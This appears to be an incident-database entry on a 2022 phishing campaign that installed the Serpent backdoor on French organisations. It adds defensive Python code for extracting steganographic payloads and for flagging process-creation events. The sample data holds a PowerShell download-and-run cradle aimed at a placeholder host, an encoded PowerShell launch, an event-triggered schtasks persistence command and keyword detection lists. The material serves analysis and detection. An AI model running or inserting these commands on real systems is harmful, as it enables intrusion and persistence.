Cyber Incident Victim: France
Date:
Mar 2022
Location:
France
Summary
A cyberattack targeted French entities in the construction, real estate, and government sectors via GDPR-themed phishing emails carrying macro-enabled Word documents. The macros retrieved a steganographic image that concealed a PowerShell script; that script installed Python through the open-source Chocolatey package manager, pulled the required Python dependencies, and then fetched a second steganographic image containing a Python backdoor dubbed Serpent. The backdoor established Tor-proxied C2 channels, enabling command execution, exfiltration of command output via Termbin, and persistence through an event-triggered scheduled task whose payload runs under a legitimate Windows task-host process. The campaign combined several uncommon evasion techniques (steganographic payload delivery, abuse of legitimate open-source tooling, and signed-binary proxy execution through the task scheduler) to bypass defenses; the attackers' ultimate objectives remain undetermined.
Description
In early 2022, Proofpoint identified a targeted campaign against French organizations in the construction, real estate, and government sectors. The threat actor sent phishing emails with French-language subjects such as "Candidature - Jeanne Vrakele" (a job application) from spoofed Gmail addresses such as jeanne.vrakele@gmail[.]com; the lures claimed to carry GDPR compliance information. The attachments were macro-enabled Microsoft Word documents whose Visual Basic for Applications (VBA) macros ran once the recipient enabled content. The macro retrieved a steganographic image hosted on fhccu[.]com, a compromised website belonging to a Jamaican credit union; the file presented as a cartoon image but concealed a base64-encoded PowerShell script. That script downloaded and installed the open-source Chocolatey package manager, a technique Proofpoint had not previously observed in malicious campaigns, and used it to install Python, with the bundled pip package installer then pulling in the backdoor's dependencies. The script next fetched a second steganographic image from the same domain containing a base64-encoded Python backdoor, wrote it to disk as MicrosoftSecurityUpdate.py, and launched it through a batch file. As a final step it opened a shortened URL that redirected to the legitimate Microsoft Office help website, most likely as a decoy for the victim.
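The page does not say how the images carried the scripts. A common and cheap form of this steganography is to append the base64 text after the image's end-of-image marker, so that viewers still render the picture while the loader simply reads past it. The triage helper below, an added example rather than Proofpoint's or the attackers' code, assumes exactly that layout (an assumption, since the campaign's carrier format is not described here): it locates the PNG IEND chunk or JPEG EOI marker, decodes any base64 run that follows it, and flags decoded text that looks like PowerShell. The sample image is constructed inline.

```python
import base64
import re

# Constructed sample, not a file from the campaign: a minimal PNG skeleton
# followed by a base64-encoded PowerShell download cradle appended after IEND.
PNG_SIG = b"\x89PNG\r\n\x1a\n"
IEND_CHUNK = b"\x00\x00\x00\x00IEND\xaeB`\x82"   # zero-length IEND chunk + CRC
STUB_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_IMAGE = PNG_SIG + b"\x00" * 32 + IEND_CHUNK + base64.b64encode(STUB_PS.encode())
CLEAN_IMAGE = PNG_SIG + b"\x00" * 32 + IEND_CHUNK

# Assumption: the payload sits after the format's terminal marker.
TRAILERS = {
    b"\x89PNG": IEND_CHUNK,   # PNG: last chunk is IEND
    b"\xff\xd8\xff": b"\xff\xd9",  # JPEG: end-of-image marker
}
# base64 alphabet plus whitespace; require a run long enough to be a script.
B64_RE = re.compile(rb"[A-Za-z0-9+/=\s]{40,}")
PS_HINTS = ("IEX", "Invoke-Expression", "DownloadString", "New-Object",
            "FromBase64String", "-EncodedCommand")


def trailing_data(blob: bytes) -> bytes:
    """Return the bytes after the image's terminal marker, or b'' if none/unknown format."""
    for sig, trailer in TRAILERS.items():
        if blob.startswith(sig):
            idx = blob.rfind(trailer)  # base64 is ASCII, so it cannot contain 0xFF 0xD9
            return b"" if idx == -1 else blob[idx + len(trailer):]
    return b""


def extract_payload(blob: bytes):
    """Decode an appended base64 blob and classify it; None if nothing is appended."""
    extra = trailing_data(blob)
    match = B64_RE.search(extra)
    if not match:
        return None
    try:
        decoded = base64.b64decode(match.group(0))  # non-alphabet bytes (whitespace) are dropped
    except ValueError:
        return None
    text = decoded.decode("utf-8", errors="replace")
    kind = "powershell" if any(hint in text for hint in PS_HINTS) else "unknown"
    return {"bytes_after_eoi": len(extra), "kind": kind, "decoded": text}


if __name__ == "__main__":
    print(extract_payload(SAMPLE_IMAGE))
    print(extract_payload(CLEAN_IMAGE))
```

Run it over every image fetched from a sender-controlled or freshly compromised host during an incident; a non-zero `bytes_after_eoi` is the signal, and the decoded text can be handed to the analyst without ever executing it.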

The Python backdoor, dubbed "Serpent" by researchers, communicated with two Tor hidden services through Tor2Web-style proxy domains under onion[.]pet, so it needed no Tor client on the victim. It periodically polled the first C2 server for a command formatted as "<random integer>--<hostname>--<command>" and executed it only if the embedded hostname matched the infected system, a check that keeps tasking per-victim and yields nothing useful when the string is replayed in a sandbox. After running the command through the Windows shell, the malware posted the output via PySocks to Termbin, a command-line pastebin service, and reported the resulting Termbin URL to the second C2 server in HTTP headers. The attackers also used an uncommon detection-evasion technique: schtasks.exe created a scheduled task triggered by a dummy Windows event with ID 777, so that the task's executable (calc.exe in the observed sample) started as a child of the legitimate taskhostw.exe binary rather than of the script that created it, breaking the parent-child lineage that many EDR rules key on. Proofpoint's products detected all of the associated malicious documents, and Proofpoint published Emerging Threats signatures covering Chocolatey-related network traffic and the malicious script retrieval patterns. The campaign's precise impact remained unconfirmed, though a successful compromise would have given the attackers remote administration, data exfiltration, or additional payload deployment. No attribution to a known threat actor was established during the investigation.
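The chain described above leaves several process-creation artifacts that do not depend on the specific domains or hashes: an Office application spawning a script host, choco.exe launched from a script host, python.exe running a script from a user-writable path, schtasks.exe creating an event-triggered task, and an unexpected child of taskhostw.exe. The detection logic below is an added example (not Proofpoint's signatures) that runs those rules over constructed Sysmon-style process-creation events; the field names, paths and the choice to flag any child of taskhostw.exe are assumptions to tune against your own baseline.

```python
import ntpath

# Constructed, already-parsed Sysmon EventID 1 style records (not logs from the campaign).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"WINWORD.EXE /n C:\Users\alice\Downloads\candidature.docm"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"Image": r"C:\ProgramData\chocolatey\bin\choco.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "choco install python -y"},
    {"Image": r"C:\Python310\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python.exe C:\Users\Public\MicrosoftSecurityUpdate.py"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Python310\python.exe",
     "CommandLine": 'schtasks /Create /TN Update /TR calc.exe /SC ONEVENT /EC Application /MO "*[System[EventID=777]]"'},
    {"Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\taskhostw.exe",
     "CommandLine": "calc.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PYTHON_HOSTS = {"python.exe", "pythonw.exe"}
USER_WRITABLE = (r"c:\users\\", r"c:\programdata\\", r"c:\windows\temp\\")


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches (empty list if benign)."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")          # macro -> PowerShell stage
    if image == "choco.exe" and parent in SCRIPT_HOSTS:
        hits.append("chocolatey_from_script_host")        # loader installing Chocolatey/Python
    if image in PYTHON_HOSTS and any(p.rstrip("\\") in cmd for p in USER_WRITABLE):
        hits.append("python_script_from_user_writable_path")
    if image == "schtasks.exe" and "/sc onevent" in cmd and "eventid=" in cmd:
        hits.append("schtasks_event_triggered_task")      # the Event ID 777 trick
    if parent == "taskhostw.exe":
        hits.append("child_of_taskhostw")                 # assumption: rarely spawns children
    return hits


def detect(events) -> list:
    """Pair each matching rule with the index of the event that triggered it."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The fourth rule is the one worth keeping even after the campaign's indicators age out: an event-triggered task whose XPath filter names an arbitrary event ID is almost never created by legitimate software, and it is the step that makes the payload appear as a child of the task host rather than of the loader.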
